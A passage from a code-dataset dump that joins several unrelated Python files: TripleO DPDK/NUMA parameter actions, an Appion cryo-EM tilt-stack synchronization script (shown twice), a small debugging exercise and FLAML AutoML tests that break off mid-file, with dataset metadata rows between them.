                               'DPDK NIC: %s' % phy_name)
                        return actions.Result(error=msg)
                    dpdk_nic_info = {'name': phy_name,
                                     'numa_node': node,
                                     'mtu': mtu,
                                     'bridge_name': bridge_name,
                                     'addresses': addresses}
                    dpdk_nics_numa_info.append(dpdk_nic_info)
        return dpdk_nics_numa_info
class GetDpdkCoreListAction(base.TripleOAction):
    """Gets the DPDK PMD Core List.
    With input as the number of physical cores for each NUMA node,
    find the right logical CPUs to be allocated along with its
    siblings for the PMD core list.
    :param inspect_data: introspection data
    :param numa_nodes_cores_count: physical cores count for each NUMA
    :return: DPDK Core List
    """
    def __init__(self, inspect_data, numa_nodes_cores_count):
        super(GetDpdkCoreListAction, self).__init__()
        self.inspect_data = inspect_data
        self.numa_nodes_cores_count = numa_nodes_cores_count
    def run(self, context):
        """For each NUMA node, pick thread-sibling groups from cores other
        than the one holding the node's lowest thread id (that core is left
        for host processes), up to the requested per-node core count.
        Returns a comma-separated string of thread ids, or an error Result
        when the introspection data is missing."""
        dpdk_core_list = []
        numa_cpus_info = self.inspect_data.get('numa_topology',
                                               {}).get('cpus', [])
        # Checks whether numa topology cpus information is not available
        # in introspection data.
        if not numa_cpus_info:
            msg = 'Introspection data does not have numa_topology.cpus'
            return actions.Result(error=msg)
        # Checks whether CPU physical cores count for each NUMA nodes is
        # not available
        if not self.numa_nodes_cores_count:
            msg = ('CPU physical cores count for each NUMA nodes '
                   'is not available')
            return actions.Result(error=msg)
        numa_nodes_threads = {}
        # Creates list for all available threads in each NUMA node
        for cpu in numa_cpus_info:
            if not cpu['numa_node'] in numa_nodes_threads:
                numa_nodes_threads[cpu['numa_node']] = []
            numa_nodes_threads[cpu['numa_node']].extend(cpu['thread_siblings'])
        for node, node_cores_count in enumerate(self.numa_nodes_cores_count):
            # Gets least thread in NUMA node
            # NOTE(review): raises KeyError if more per-node counts are
            # supplied than NUMA nodes present in the introspection data.
            numa_node_min = min(numa_nodes_threads[node])
            cores_count = node_cores_count
            for cpu in numa_cpus_info:
                # Bug fix: break *before* selecting so that a requested
                # count of 0 allocates no cores on this node.  Previously
                # the post-decrement '== 0' check never fired for a zero
                # request and every non-first core was taken.
                if cores_count <= 0:
                    break
                if cpu['numa_node'] == node:
                    # Adds threads from core which is not having least thread
                    if numa_node_min not in cpu['thread_siblings']:
                        dpdk_core_list.extend(cpu['thread_siblings'])
                        cores_count -= 1
        return ','.join([str(thread) for thread in dpdk_core_list])
class GetHostCpusListAction(base.TripleOAction):
    """Gets the Host CPUs List.
    CPU threads from the first physical core are allocated for host
    processes on each NUMA node.
    :param inspect_data: introspection data
    :return: Host CPUs List
    """
    def __init__(self, inspect_data):
        super(GetHostCpusListAction, self).__init__()
        self.inspect_data = inspect_data
    def run(self, context):
        numa_cpus_info = self.inspect_data.get('numa_topology',
                                               {}).get('cpus', [])
        # Fail early when the introspection data lacks NUMA CPU topology.
        if not numa_cpus_info:
            msg = 'Introspection data does not have numa_topology.cpus'
            return actions.Result(error=msg)
        # Map each NUMA node to every thread id it owns.
        threads_per_node = {}
        for cpu in numa_cpus_info:
            threads_per_node.setdefault(
                cpu['numa_node'], []).extend(cpu['thread_siblings'])
        host_cpus_list = []
        for numa_node in sorted(threads_per_node.keys()):
            node = int(numa_node)
            # The physical core owning the lowest thread id on this node
            # is reserved for host processes; take all of its siblings.
            lowest_thread = min(threads_per_node[numa_node])
            for cpu in numa_cpus_info:
                if (cpu['numa_node'] == node and
                        lowest_thread in cpu['thread_siblings']):
                    host_cpus_list.extend(cpu['thread_siblings'])
                    break
        return ','.join(str(thread) for thread in host_cpus_list)
class GetDpdkSocketMemoryAction(base.TripleOAction):
    """Gets the DPDK Socket Memory List.
    For NUMA node with DPDK nic, socket memory is calculated
    based on MTU, Overhead and Packet size in buffer.
    For NUMA node without DPDK nic, minimum socket memory is
    assigned (recommended 1GB)
    :param dpdk_nics_numa_info: DPDK nics numa info
    :param numa_nodes: list of numa nodes
    :param overhead: overhead value
    :param packet_size_in_buffer: packet size in buffer
    :param minimum_socket_memory: minimum socket memory
    :return: DPDK Socket Memory List
    """
    def __init__(self, dpdk_nics_numa_info, numa_nodes,
                 overhead, packet_size_in_buffer,
                 minimum_socket_memory=1024):
        # All memory quantities handled below appear to be in MB
        # (minimum_socket_memory defaults to 1024 == 1 GB).
        super(GetDpdkSocketMemoryAction, self).__init__()
        self.dpdk_nics_numa_info = dpdk_nics_numa_info
        self.numa_nodes = numa_nodes
        self.overhead = overhead
        self.packet_size_in_buffer = packet_size_in_buffer
        self.minimum_socket_memory = minimum_socket_memory
    # Computes round off MTU value in bytes
    # example: MTU value 9000 into 9216 bytes
    def roundup_mtu_bytes(self, mtu):
        # Round the MTU up to the next multiple of 1024 bytes.
        max_div_val = int(math.ceil(float(mtu) / float(1024)))
        return (max_div_val * 1024)
    # Calculates socket memory for a NUMA node
    def calculate_node_socket_memory(
        self, numa_node, dpdk_nics_numa_info, overhead,
        packet_size_in_buffer, minimum_socket_memory):
        # Each distinct MTU on this node contributes once to the total.
        distinct_mtu_per_node = []
        socket_memory = 0
        # For DPDK numa node
        for nics_info in dpdk_nics_numa_info:
            if (numa_node == nics_info['numa_node'] and
                    not nics_info['mtu'] in distinct_mtu_per_node):
                distinct_mtu_per_node.append(nics_info['mtu'])
                roundup_mtu = self.roundup_mtu_bytes(nics_info['mtu'])
                # bytes -> MB.  NOTE(review): plain '/' floors under
                # python 2 but yields a float under python 3 -- confirm
                # the intended rounding for the target interpreter.
                socket_memory += (((roundup_mtu + overhead) *
                                  packet_size_in_buffer) /
                                  (1024 * 1024))
        # For Non DPDK numa node
        if socket_memory == 0:
            socket_memory = minimum_socket_memory
        # For DPDK numa node
        else:
            # Extra 512 MB of head room for nodes hosting DPDK nics.
            socket_memory += 512
        # Round the result up to the next whole GB, expressed in MB.
        socket_memory_in_gb = int(socket_memory / 1024)
        if socket_memory % 1024 > 0:
            socket_memory_in_gb += 1
        return (socket_memory_in_gb * 1024)
    def run(self, context):
        # Returns the per-NUMA-node socket memory (MB) as a comma
        # separated string, in self.numa_nodes order.
        dpdk_socket_memory_list = []
        for node in self.numa_nodes:
            socket_mem = self.calculate_node_socket_memory(
                node, self.dpdk_nics_numa_info, self.overhead,
                self.packet_size_in_buffer,
                self.minimum_socket_memory)
            dpdk_socket_memory_list.append(socket_mem)
        return ','.join([str(sm) for sm in dpdk_socket_memory_list])
class ConvertNumberToRangeListAction(base.TripleOAction):
    """Converts number list into range list
    :param num_list: comma delimited number list as string
    :return: comma delimited range list as string
    """
    def __init__(self, num_list):
        super(ConvertNumberToRangeListAction, self).__init__()
        self.num_list = num_list
    # converts a number list into a range list.
    # here input parameter and return value are lists
    # example: [12, 13, 14, 17] into ["12-14", "17"]
    def convert_number_to_range_list(self, num_list):
        # Work on a sorted, de-duplicated copy.  The previous
        # implementation sorted the caller's list in place, ran
        # list.index() inside the loop (quadratic), and emitted
        # duplicate range entries when the input contained repeats.
        nums = sorted(set(num_list))
        range_list = []
        if not nums:
            return range_list
        range_min = nums[0]
        last = len(nums) - 1
        for idx, num in enumerate(nums):
            # Close the current range when num has no direct successor
            # (or when this is the last number).
            if idx == last or nums[idx + 1] != num + 1:
                if range_min != num:
                    range_list.append(str(range_min) + '-' + str(num))
                else:
                    range_list.append(str(range_min))
                if idx < last:
                    range_min = nums[idx + 1]
        # here, range_list is a list of strings
        return range_list
    def run(self, context):
        # Validates the input, converts "12,13,14,17" style strings into
        # "12-14,17" style range strings, and reports failures via an
        # actions.Result error.
        try:
            if not self.num_list:
                err_msg = ("Input param 'num_list' is blank.")
                raise exception.DeriveParamsError(err_msg)
            try:
                # splitting a string (comma delimited list) into
                # list of numbers
                # example: "12,13,14,17" string into [12,13,14,17]
                num_list = [int(num.strip(' '))
                            for num in self.num_list.split(",")]
            except ValueError as exc:
                err_msg = ("Invalid number in input param "
                           "'num_list': %s" % exc)
                raise exception.DeriveParamsError(err_msg)
            range_list = self.convert_number_to_range_list(num_list)
        except exception.DeriveParamsError as err:
            LOG.error('Derive Params Error: %s', err)
            return actions.Result(error=str(err))
        # converts into comma delimited range list as string
        return ','.join(range_list)
class ConvertRangeToNumberListAction(base.TripleOAction):
    """Converts range list to integer list
    :param range_list: comma delimited range list as string / list
    :return: comma delimited number list as string
    """
    def __init__(self, range_list):
        super(ConvertRangeToNumberListAction, self).__init__()
        self.range_list = range_list
    # Expands range entries ("12-14") and honours exclusions ("^13").
    # input parameter and return value are both lists
    # example: ["12-14", "^13", "17"] into [12, 14, 17]
    def convert_range_to_number_list(self, range_list):
        included = []
        excluded = []
        try:
            for entry in range_list:
                entry = entry.strip(' ')
                if '^' in entry:
                    # "^N" marks N for exclusion from the result.
                    excluded.append(int(entry[1:]))
                elif '-' in entry:
                    bounds = entry.split("-")
                    included.extend(
                        range(int(bounds[0]), int(bounds[1]) + 1))
                else:
                    included.append(int(entry))
        except ValueError as exc:
            err_msg = ("Invalid number in input param "
                       "'range_list': %s" % exc)
            raise exception.DeriveParamsError(err_msg)
        # the result is a list of integers
        return [num for num in included if num not in excluded]
    def run(self, context):
        try:
            if not self.range_list:
                err_msg = ("Input param 'range_list' is blank.")
                raise exception.DeriveParamsError(err_msg)
            range_list = self.range_list
            # Accept both a python list and a comma delimited string.
            if not isinstance(range_list, list):
                range_list = self.range_list.split(",")
            num_list = self.convert_range_to_number_list(range_list)
        except exception.DeriveParamsError as err:
            LOG.error('Derive Params Error: %s', err)
            return actions.Result(error=str(err))
        # converts into comma delimited number list as string
        return ','.join(str(num) for num in num_list)
| 13,802 | 0 | 583 |
a1a1aa9f7cbbc6265cfe3b922867e0bc944af177 | 12,974 | py | Python | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | 1 | 2019-09-05T20:58:37.000Z | 2019-09-05T20:58:37.000Z | #!/bin/python
#python
import sys
import os
import time
import re
import shutil
import MySQLdb
#appion
from appionlib import appionScript
from appionlib import apStack
from appionlib import apDisplay
from appionlib import apEMAN
from appionlib import apFile
from appionlib.apSpider import operations
from appionlib.apTilt import apTiltPair
from appionlib import apImagicFile
import sinedon
#=====================
# Script entry point: run the stack synchronization then close the run.
if __name__ == "__main__":
	tiltstacks = tiltStackSync()
	tiltstacks.start()
	tiltstacks.close()
| 35.545205 | 108 | 0.697934 | #!/bin/python
#python
import sys
import os
import time
import re
import shutil
import MySQLdb
#appion
from appionlib import appionScript
from appionlib import apStack
from appionlib import apDisplay
from appionlib import apEMAN
from appionlib import apFile
from appionlib.apSpider import operations
from appionlib.apTilt import apTiltPair
from appionlib import apImagicFile
import sinedon
class tiltStackSync(appionScript.AppionScript):
	"""Appion script that re-orders an untilted/tilted stack pair.
	Particle pairs recorded in ApTiltParticlePairData are used to write
	two new stacks in which particle N of the untilted stack and
	particle N of the tilted stack image the same physical particle.
	"""
	def __init__(self):
		"""
		Need to connect to DB server before moving forward
		"""
		appionScript.AppionScript.__init__(self)
		# connect
		self.dbconf = sinedon.getConfig('appiondata')
		self.db = MySQLdb.connect(**self.dbconf)
		self.db.autocommit(True)
		# create a cursor
		self.cursor = self.db.cursor()
	#=====================
	def setupParserOptions(self):
		"""Declare the command line options used by this script."""
		self.parser.set_usage("Usage: %prog --notstackid=1239 --tiltstackid=1240")
		self.parser.add_option("--tiltstackid", dest="tiltstackid",
			help="Tilted stack id", metavar="ID")
		self.parser.add_option("--notstackid", dest="notstackid",
			help="Untilted stack id", metavar="ID")
	#=====================
	def checkConflicts(self):
		"""Validate required options and cache the tilted stack record."""
		if self.params['tiltstackid'] is None:
			apDisplay.printError("Enter a tilted stack ID")
		if self.params['notstackid'] is None:
			apDisplay.printError("Enter a untilted stack ID")
		if self.params['runname'] is None:
			apDisplay.printError("Enter run name")
		self.tiltstackdata = apStack.getOnlyStackData(self.params['tiltstackid'])
	#=====================
	def setRunDir(self):
		"""Place the run directory in ../tiltsync next to the tilted stack."""
		stackpath = self.tiltstackdata['path']['path']
		self.params['rundir'] = os.path.abspath(os.path.join(stackpath, "../tiltsync", self.params['runname']))
	#=====================
	def getPartcileLists(self):
		"""Fetch matched (untilted, tilted) particle number pairs.
		Queries ApTiltParticlePairData in both storage orders, writes the
		pairs to a spider doc file and returns them as a list of dicts
		with keys 'not' and 'tilt' (1-based particle numbers).
		NOTE: the method name keeps the historical 'Partcile' typo so
		external callers are not broken.
		"""
		#first query
		query1 = self.queryParticles(swap=False)
		self.cursor.execute(query1)
		results1 = self.cursor.fetchall()
		apDisplay.printMsg("Found "+str(len(results1))+" particle pairs in forward order")
		#swap particle1 and particle2 in ApTiltParticlePairData
		query2 = self.queryParticles(swap=True)
		self.cursor.execute(query2)
		results2 = self.cursor.fetchall()
		apDisplay.printMsg("Found "+str(len(results2))+" particle pairs in reverse order")
		parttree = self.parseResults(results1, results2)
		f = open("tiltsync-"+self.timestamp+".dat", "w")
		count = 0
		for partdict in parttree:
			count += 1
			# the spider doc file uses 0-based (EMAN) particle numbers
			emannotnum = partdict['not']-1
			emantiltnum = partdict['tilt']-1
			line = operations.spiderOutLine(count, (emannotnum,emantiltnum))
			f.write(line)
		f.close()
		apDisplay.printMsg("Writing "+str(len(parttree))+" particle pairs")
		if len(parttree) < 2:
			apDisplay.printError("Failed to find any particle pairs")
		return parttree
	#=====================
	def parseResults(self, results1, results2):
		"""Convert raw sql rows (notnum, tiltnum) into pair dictionaries."""
		parttree = []
		for result in results1:
			parttree.append({'not': int(result[0]), 'tilt': int(result[1])})
		for result in results2:
			parttree.append({'not': int(result[0]), 'tilt': int(result[1])})
		apDisplay.printMsg("Parsed "+str(len(parttree))+" particle pairs")
		return parttree
	#=====================
	def queryParticles(self, swap=False):
		"""Build the sql joining tilt particle pairs to both stacks.
		:param swap: when True, treat particle2 as the untilted particle
			(pairs can be stored in either order in the database).
		"""
		query = (
			"SELECT "
			+" stpart1.`particleNumber` AS partnum1, "
			+" stpart2.`particleNumber` AS partnum2 "
			+"FROM `ApTiltParticlePairData` AS tiltd "
		)
		if swap is True:
			query += (
				"LEFT JOIN `ApStackParticleData` AS stpart1 "
				+" ON stpart1.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle2` "
				+"LEFT JOIN `ApStackParticleData` AS stpart2 "
				+" ON stpart2.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle1` "
			)
		else:
			query += (
				"LEFT JOIN `ApStackParticleData` AS stpart1 "
				+" ON stpart1.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle1` "
				+"LEFT JOIN `ApStackParticleData` AS stpart2 "
				+" ON stpart2.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle2` "
			)
		query += (
			"WHERE "
			+" stpart1.`REF|ApStackData|stack` = "+str(self.params['notstackid'])+" "
			+"AND "
			+" stpart2.`REF|ApStackData|stack` = "+str(self.params['tiltstackid'])+" "
			+"ORDER BY "
			+" stpart1.`particleNumber` ASC "
			+";"
		)
		return query
	#=====================
	def makeEulerDoc(self, parttree):
		"""Write a complete spider Euler doc for all tilted particles.
		NOTE(review): this writes +gamma while appendEulerDoc() writes
		-gamma; only appendEulerDoc() is used by makeNewStacks() --
		confirm which sign convention is intended before reusing this.
		"""
		count = 0
		eulerfile = os.path.join(self.params['rundir'], "eulersdoc"+self.timestamp+".spi")
		eulerf = open(eulerfile, "w")
		apDisplay.printMsg("creating Euler doc file")
		starttime = time.time()
		for partdict in parttree:
			stackpartdata = apStack.getStackParticle(self.params['tiltstackid'], partdict['tilt'])
			count += 1
			if count%100 == 0:
				sys.stderr.write(".")
				eulerf.flush()
			gamma, theta, phi, tiltangle = apTiltPair.getParticleTiltRotationAngles(stackpartdata)
			if gamma is None:
				apDisplay.printWarning("Skipping "+str(stackpartdata))
				continue
			line = operations.spiderOutLine(count, [phi, tiltangle, gamma])
			eulerf.write(line)
		eulerf.close()
		apDisplay.printColor("finished Euler doc file in "+apDisplay.timeString(time.time()-starttime), "cyan")
		return eulerfile
	#=====================
	def appendEulerDoc(self, eulerfile, tiltpartnum, count):
		"""Append one tilted particle's Euler angles to the spider doc."""
		eulerf = open(eulerfile, "a")
		stackpartdata = apStack.getStackParticle(self.params['tiltstackid'], tiltpartnum)
		gamma, theta, phi, tiltangle = apTiltPair.getParticleTiltRotationAngles(stackpartdata)
		if gamma is None:
			apDisplay.printWarning("Skipping "+str(stackpartdata))
			# fix: close the handle on the early-return path as well
			eulerf.close()
			return
		line = operations.spiderOutLine(count, [phi, tiltangle, -1.0*gamma])
		eulerf.write(line)
		eulerf.close()
	#=====================
	def uploadResults(self, parttree=None):
		"""Insert the two synchronized stacks and their particles into the db.
		:param parttree: list of {'not': n, 'tilt': m} pair dicts; required
			when --commit is set.
		fix: this method previously referenced the undefined names
		``parttree`` and ``total`` (and the never-imported ``appiondata``
		module), so it crashed whenever --commit was used.
		"""
		if self.params['commit'] is False:
			return
		if parttree is None:
			apDisplay.printError("uploadResults() requires the particle pair list")
		# appiondata was referenced here without ever being imported
		from appionlib import appiondata
		# Produce new stacks
		oldstack = apStack.getOnlyStackData(self.params['notstackid'], msg=False)
		notstack = appiondata.ApStackData()
		notstack['path'] = appiondata.ApPathData(path=os.path.abspath(self.params['rundir']))
		notstack['name'] = self.notstackdata['name']
		if notstack.query(results=1):
			apDisplay.printError("A stack with these parameters already exists")
		tiltstack = appiondata.ApStackData()
		tiltstack['path'] = appiondata.ApPathData(path=os.path.abspath(self.params['rundir']))
		tiltstack['name'] = self.tiltstackdata['name']
		if tiltstack.query(results=1):
			apDisplay.printError("A stack with these parameters already exists")
		# Fill in data and submit
		# NOTE(review): both new stacks record the untilted stack as
		# their 'oldstack' -- confirm the tilted stack should not
		# reference the tilted parent instead.
		notstack['oldstack'] = oldstack
		notstack['hidden'] = False
		notstack['substackname'] = self.params['runname']
		notstack['description'] = self.params['description']+" ... tilt stack sorted"
		notstack['pixelsize'] = oldstack['pixelsize']
		notstack.insert()
		tiltstack['oldstack'] = oldstack
		tiltstack['hidden'] = False
		tiltstack['substackname'] = self.params['runname']
		tiltstack['description'] = self.params['description']+" ... tilt stack sorted"
		tiltstack['pixelsize'] = oldstack['pixelsize']
		tiltstack.insert()
		# Insert stack images
		apDisplay.printMsg("Inserting stack particles")
		total = len(parttree)
		count = 0
		for partdict in parttree:
			count += 1
			if count % 100 == 0:
				sys.stderr.write("\b"*24)
				sys.stderr.write(str(count)+" of "+str(total)+" complete")
			# Get particles from the old stacks
			oldnotparticle = apStack.getStackParticle(self.params['notstackid'], partdict['not'])
			oldtiltparticle = apStack.getStackParticle(self.params['tiltstackid'], partdict['tilt'])
			# Insert particle
			notparticle = appiondata.ApStackParticleData()
			notparticle.update(oldnotparticle)
			notparticle['particleNumber'] = count
			notparticle['stack'] = notstack
			notparticle.insert()
			tiltparticle = appiondata.ApStackParticleData()
			tiltparticle.update(oldtiltparticle)
			tiltparticle['particleNumber'] = count
			tiltparticle['stack'] = tiltstack
			tiltparticle.insert()
		apDisplay.printMsg("\n%d particles have been inserted into the tilt synchronized stacks"%(count))
		# Insert runs in stack
		apDisplay.printMsg("Inserting Runs in Stack")
		runsinstack = apStack.getRunsInStack(self.params['notstackid'])
		for run in runsinstack:
			newrunsq = appiondata.ApRunsInStackData()
			newrunsq['stack'] = notstack
			newrunsq['stackRun'] = run['stackRun']
			newrunsq.insert()
		runsinstack = apStack.getRunsInStack(self.params['tiltstackid'])
		for run in runsinstack:
			newrunsq = appiondata.ApRunsInStackData()
			newrunsq['stack'] = tiltstack
			newrunsq['stackRun'] = run['stackRun']
			newrunsq.insert()
		apDisplay.printMsg("finished")
		return
	#=====================
	def makeNewStacks(self, parttree):
		"""Write the synchronized untilted/tilted stacks to the run dir.
		Particles are buffered in memory and flushed to numbered partial
		stacks every `sizelimit` particles, then merged into notstack.hed
		and tiltstack.hed.  Euler angles for the tilted particles are
		appended to a spider doc file along the way.
		"""
		### untilted stack
		self.notstackdata = apStack.getOnlyStackData(self.params['notstackid'])
		notstackfile = os.path.join(self.notstackdata['path']['path'], self.notstackdata['name'])
		### tilted stack
		if not self.tiltstackdata:
			self.tiltstackdata = apStack.getOnlyStackData(self.params['tiltstackid'])
		tiltstackfile = os.path.join(self.tiltstackdata['path']['path'], self.tiltstackdata['name'])
		### make doc file of Euler angles
		eulerfile = os.path.join(self.params['rundir'], "eulersdoc"+self.timestamp+".spi")
		if os.path.isfile(eulerfile):
			apFile.removeFile(eulerfile)
		count = 0
		notstacklist = []
		tiltstacklist = []
		# flush partial stacks to disk every `sizelimit` particles to
		# bound memory usage
		sizelimit = 2048
		notbox = apImagicFile.getBoxsize(notstackfile)
		tiltbox = apImagicFile.getBoxsize(tiltstackfile)
		tiltstacks = []
		notstacks = []
		t0 = time.time()
		for partdict in parttree:
			### print friendly message
			if count % 100 == 0:
				backs = "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
				sys.stderr.write(backs+backs+backs+backs)
				if count > sizelimit:
					esttime = (len(parttree)/float(count)-1.0)*(time.time()-t0)
					sys.stderr.write(str(count)+" particles of "+str(len(parttree))
						+", "+apDisplay.timeString(esttime)+" remaining")
				else:
					sys.stderr.write(str(count)+" particles of "+str(len(parttree)))
			### save stacks to file to save memory
			if count%sizelimit == 0:
				if count > 1:
					apDisplay.printMsg("Writing stacks to file")
					t1 = time.time()
					tiltname = os.path.join(self.params['rundir'], "tiltstack%d.hed"%(count))
					apFile.removeStack(tiltname)
					apImagicFile.writeImagic(tiltstacklist, tiltname, msg=False)
					tiltstacks.append(tiltname)
					apDisplay.printMsg("finished tilted stack in "+apDisplay.timeString(time.time()-t1))
					t1 = time.time()
					notname = os.path.join(self.params['rundir'], "notstack%d.hed"%(count))
					apFile.removeStack(notname)
					apImagicFile.writeImagic(notstacklist, notname, msg=False)
					notstacks.append(notname)
					apDisplay.printMsg("finished untilted stack in "+apDisplay.timeString(time.time()-t1))
				### reset stacks
				apDisplay.printMsg("Reset stacks in memory")
				notstacklist = []
				tiltstacklist = []
			### increment count
			count += 1
			### write to Euler doc
			self.appendEulerDoc(eulerfile, partdict['tilt'], count)
			### untilted stack
			notpartarray = apImagicFile.readSingleParticleFromStack(notstackfile, partdict['not'], notbox, False)
			notstacklist.append(notpartarray)
			### tilted stack
			tiltpartarray = apImagicFile.readSingleParticleFromStack(tiltstackfile, partdict['tilt'], tiltbox, False)
			tiltstacklist.append(tiltpartarray)
		### write remaining particles to stack
		if len(notstacklist) > 0:
			apDisplay.printMsg("Writing stacks to file")
			t1 = time.time()
			tiltname = os.path.join(self.params['rundir'], "tiltstack%d.hed"%(count))
			apFile.removeStack(tiltname)
			apImagicFile.writeImagic(tiltstacklist, tiltname, msg=False)
			tiltstacks.append(tiltname)
			apDisplay.printMsg("finished tilted stack in "+apDisplay.timeString(time.time()-t1))
			t1 = time.time()
			notname = os.path.join(self.params['rundir'], "notstack%d.hed"%(count))
			apFile.removeStack(notname)
			apImagicFile.writeImagic(notstacklist, notname, msg=False)
			notstacks.append(notname)
			apDisplay.printMsg("finished untilted stack in "+apDisplay.timeString(time.time()-t1))
		### merge NOT stack
		notname = os.path.join(self.params['rundir'], "notstack.hed")
		apImagicFile.mergeStacks(notstacks, notname)
		for stackname in notstacks:
			apFile.removeStack(stackname, warn=False)
		### merge TILT stack
		tiltname = os.path.join(self.params['rundir'], "tiltstack.hed")
		apImagicFile.mergeStacks(tiltstacks, tiltname)
		for stackname in tiltstacks:
			apFile.removeStack(stackname, warn=False)
		### upload results
		if self.params['commit'] is True:
			# fix: pass the pair list through so the database upload no
			# longer crashes on an undefined name
			self.uploadResults(parttree)
	#=====================
	def start(self):
		"""Main entry point called by the AppionScript framework."""
		parttree = self.getPartcileLists()
		self.makeNewStacks(parttree)
#=====================
# Script entry point: run the stack synchronization then close the run.
if __name__ == "__main__":
	tiltstacks = tiltStackSync()
	tiltstacks.start()
	tiltstacks.close()
| 11,568 | 870 | 23 |
7c5fb9f45657ecafdf1c38f92248649f38bb6604 | 260 | py | Python | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | # bug 3
# http://asu-compmethodsphysics-phy494.github.io/ASU-PHY494/2017/01/24/04_Debugging_1/#activity-fix-as-many-bugs-as-possible
# Print "error" for input 0:
# float("0") compares exactly equal to 0, so the == test below is safe
# for this exercise.
x = float(input("Enter non-zero number --> "))
if x == 0:
    print("ERROR: number cannot be 0")
| 28.888889 | 124 | 0.7 | # bug 3
# http://asu-compmethodsphysics-phy494.github.io/ASU-PHY494/2017/01/24/04_Debugging_1/#activity-fix-as-many-bugs-as-possible
# Print "error" for input 0:
# float("0") compares exactly equal to 0, so the == test below is safe
# for this exercise.
x = float(input("Enter non-zero number --> "))
if x == 0:
    print("ERROR: number cannot be 0")
| 0 | 0 | 0 |
e009120c4e68c7222536c86157b18d6d0fc86315 | 5,348 | py | Python | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | import sys
from openml.exceptions import OpenMLServerException
from requests.exceptions import ChunkedEncodingError
if __name__ == "__main__":
    # The 600 s budget reaches performance_check_budget, which enables
    # the accuracy assertion inside test_automl.
    test_automl(600)
| 36.882759 | 152 | 0.663426 | import sys
from openml.exceptions import OpenMLServerException
from requests.exceptions import ChunkedEncodingError
def test_automl(budget=5, dataset_format="dataframe", hpo_method=None):
    """End-to-end FLAML AutoML smoke test on OpenML dataset 1169.

    Trains a classifier under ``budget`` seconds, prints the best model
    and several test metrics, pickles the fitted object and re-parses
    the FLAML log.  With the full 600 s budget an accuracy floor is
    asserted; the run is skipped gracefully when OpenML is unreachable.
    """
    from flaml.data import load_openml_dataset
    import urllib3
    performance_check_budget = 600
    # On macOS with python 3.9 and dataframe input, always run the full
    # budget -- presumably to stabilize the CI accuracy check; confirm.
    if (
        sys.platform == "darwin"
        and budget < performance_check_budget
        and dataset_format == "dataframe"
        and "3.9" in sys.version
    ):
        budget = performance_check_budget  # revise the budget on macos
    try:
        X_train, X_test, y_train, y_test = load_openml_dataset(
            dataset_id=1169, data_dir="test/", dataset_format=dataset_format
        )
    except (
        OpenMLServerException,
        ChunkedEncodingError,
        urllib3.exceptions.ReadTimeoutError,
    ) as e:
        # Network/server failures skip the test rather than fail it.
        print(e)
        return
    """ import AutoML class from flaml package """
    from flaml import AutoML
    automl = AutoML()
    settings = {
        "time_budget": budget,  # total running time in seconds
        "metric": "accuracy",  # primary metrics can be chosen from: ['accuracy','roc_auc','roc_auc_ovr','roc_auc_ovo','f1','log_loss','mae','mse','r2']
        "task": "classification",  # task type
        "log_file_name": "airlines_experiment.log",  # flaml log file
        "seed": 7654321,  # random seed
        "hpo_method": hpo_method,
    }
    """The main flaml automl API"""
    automl.fit(X_train=X_train, y_train=y_train, **settings)
    """ retrieve best config and best learner """
    print("Best ML leaner:", automl.best_estimator)
    print("Best hyperparmeter config:", automl.best_config)
    print("Best accuracy on validation data: {0:.4g}".format(1 - automl.best_loss))
    print(
        "Training duration of best run: {0:.4g} s".format(automl.best_config_train_time)
    )
    print(automl.model.estimator)
    print("time taken to find best model:", automl.time_to_find_best_model)
    """ pickle and save the automl object """
    import pickle
    with open("automl.pkl", "wb") as f:
        pickle.dump(automl, f, pickle.HIGHEST_PROTOCOL)
    """ compute predictions of testing dataset """
    y_pred = automl.predict(X_test)
    print("Predicted labels", y_pred)
    print("True labels", y_test)
    y_pred_proba = automl.predict_proba(X_test)[:, 1]
    """ compute different metric values on testing dataset """
    from flaml.ml import sklearn_metric_loss_score
    accuracy = 1 - sklearn_metric_loss_score("accuracy", y_pred, y_test)
    print("accuracy", "=", accuracy)
    print(
        "roc_auc", "=", 1 - sklearn_metric_loss_score("roc_auc", y_pred_proba, y_test)
    )
    print("log_loss", "=", sklearn_metric_loss_score("log_loss", y_pred_proba, y_test))
    # Only assert model quality when the full search budget was used.
    if budget >= performance_check_budget:
        assert accuracy >= 0.669, "the accuracy of flaml should be larger than 0.67"
    from flaml.data import get_output_from_log
    (
        time_history,
        best_valid_loss_history,
        valid_loss_history,
        config_history,
        metric_history,
    ) = get_output_from_log(filename=settings["log_file_name"], time_budget=6)
    for config in config_history:
        print(config)
    print(automl.resource_attr)
    print(automl.max_resource)
    print(automl.min_resource)
    # Short-budget runs additionally exercise the ensemble code path.
    if budget < performance_check_budget:
        automl.fit(X_train=X_train, y_train=y_train, ensemble=True, **settings)
def test_automl_array():
    # Run the automl smoke test with numpy-array dataset format and the
    # "bs" hpo_method (presumably BlendSearch -- confirm against flaml
    # docs) under a short 5 s budget.
    test_automl(5, "array", "bs")
def test_mlflow():
